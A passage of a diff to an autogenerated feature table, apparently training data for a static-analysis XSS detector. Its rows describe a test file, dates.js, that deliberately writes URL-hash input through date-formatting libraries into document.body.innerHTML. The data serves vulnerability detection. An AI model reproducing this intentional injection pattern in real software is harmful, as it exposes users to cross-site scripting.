contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:64 | exceptional return of dateFns ... (taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:64 | exceptional return of dateFns ... (taint) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:64 | exceptional return of dateFns ... (taint) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:64 | exceptional return of dateFns ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:70 | dateFns ... )(time) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:70 | dateFns ... )(time) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:70 | dateFns ... )(time) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:70 | dateFns ... )(time) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:70 | dateFns ... )(time) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:70 | dateFns ... )(time) | stringConcatenatedWith | 'Time is ' -endpoint- | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:70 | exceptional return of dateFns ... )(time) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:70 | exceptional return of dateFns ... )(time) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:70 | exceptional return of dateFns ... )(time) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:70 | exceptional return of dateFns ... )(time) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:70 | exceptional return of dateFns ... )(time) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:13:52:13:57 | format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:13:52:13:57 | format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:13:52:13:57 | format | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:13:52:13:57 | format | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:13:52:13:57 | format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:13:59:13:63 | taint | CalleeFlexibleAccessPath | dateFnsFp.format | | autogenerated/Xss/DomBasedXss/dates.js:13:59:13:63 | taint | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:13:59:13:63 | taint | calleeImports | date-fns/fp | @@ -12915,12 +96776,74 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:13:66:13:69 | time | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:13:66:13:69 | time | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:13:66:13:69 | time | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:12 | document | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:12 | document | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:17 | document.body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:17 | document.body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:27 | documen ... nerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:27 | documen ... nerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:70 | documen ... time)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:70 | documen ... time)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:70 | documen ... time)}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:70 | documen ... time)}` | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:14:5:14:70 | documen ... time)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:14:14:14:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:14:14:14:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:14:14:14:17 | body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:14:14:14:17 | body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:14:14:14:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:14:19:14:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:14:19:14:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:14:19:14:27 | innerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:14:19:14:27 | innerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:14:19:14:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:14:31:14:70 | `Time i ... time)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:14:31:14:70 | `Time i ... time)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:14:31:14:70 | `Time i ... time)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:14:31:14:70 | `Time i ... time)}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:14:31:14:70 | `Time i ... time)}` | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:14:31:14:70 | `Time i ... time)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:14:32:14:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:14:32:14:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:14:32:14:39 | Time is | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:14:32:14:39 | Time is | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:14:32:14:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:14:32:14:39 | Time is | stringConcatenatedWith | -endpoint- dateFns.format() | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:48 | dateFns | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:48 | dateFns | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:48 | dateFns | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:48 | dateFns | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:48 | dateFns | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:55 | dateFns.format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:55 | dateFns.format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:55 | dateFns.format | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:55 | dateFns.format | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:55 | dateFns.format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:68 | dateFns ... , time) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:68 | dateFns ... , time) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:68 | dateFns ... , time) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:68 | dateFns ... , time) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:68 | dateFns ... , time) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:68 | dateFns ... , time) | stringConcatenatedWith | 'Time is ' -endpoint- | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:68 | exceptional return of dateFns ... , time) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:68 | exceptional return of dateFns ... , time) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:68 | exceptional return of dateFns ... , time) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:68 | exceptional return of dateFns ... , time) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:14:42:14:68 | exceptional return of dateFns ... , time) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:14:50:14:55 | format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:14:50:14:55 | format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:14:50:14:55 | format | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:14:50:14:55 | format | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:14:50:14:55 | format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:14:57:14:61 | taint | CalleeFlexibleAccessPath | dateFns.format | | autogenerated/Xss/DomBasedXss/dates.js:14:57:14:61 | taint | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:14:57:14:61 | taint | calleeImports | date-fns | @@ -12939,12 +96862,84 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:14:64:14:67 | time | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:14:64:14:67 | time | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:14:64:14:67 | time | receiverName | dateFns | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:12 | document | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:12 | document | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:17 | document.body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:17 | document.body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:27 | documen ... nerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:27 | documen ... nerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:72 | documen ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:72 | documen ... aint)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:72 | documen ... aint)}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:72 | documen ... aint)}` | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:15:5:15:72 | documen ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:15:14:15:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:15:14:15:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:15:14:15:17 | body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:15:14:15:17 | body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:15:14:15:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:15:19:15:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:15:19:15:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:15:19:15:27 | innerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:15:19:15:27 | innerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:15:19:15:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:15:31:15:72 | `Time i ... aint)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:15:31:15:72 | `Time i ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:15:31:15:72 | `Time i ... aint)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:15:31:15:72 | `Time i ... aint)}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:15:31:15:72 | `Time i ... aint)}` | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:15:31:15:72 | `Time i ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:15:32:15:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:15:32:15:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:15:32:15:39 | Time is | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:15:32:15:39 | Time is | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:15:32:15:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:15:32:15:39 | Time is | stringConcatenatedWith | -endpoint- 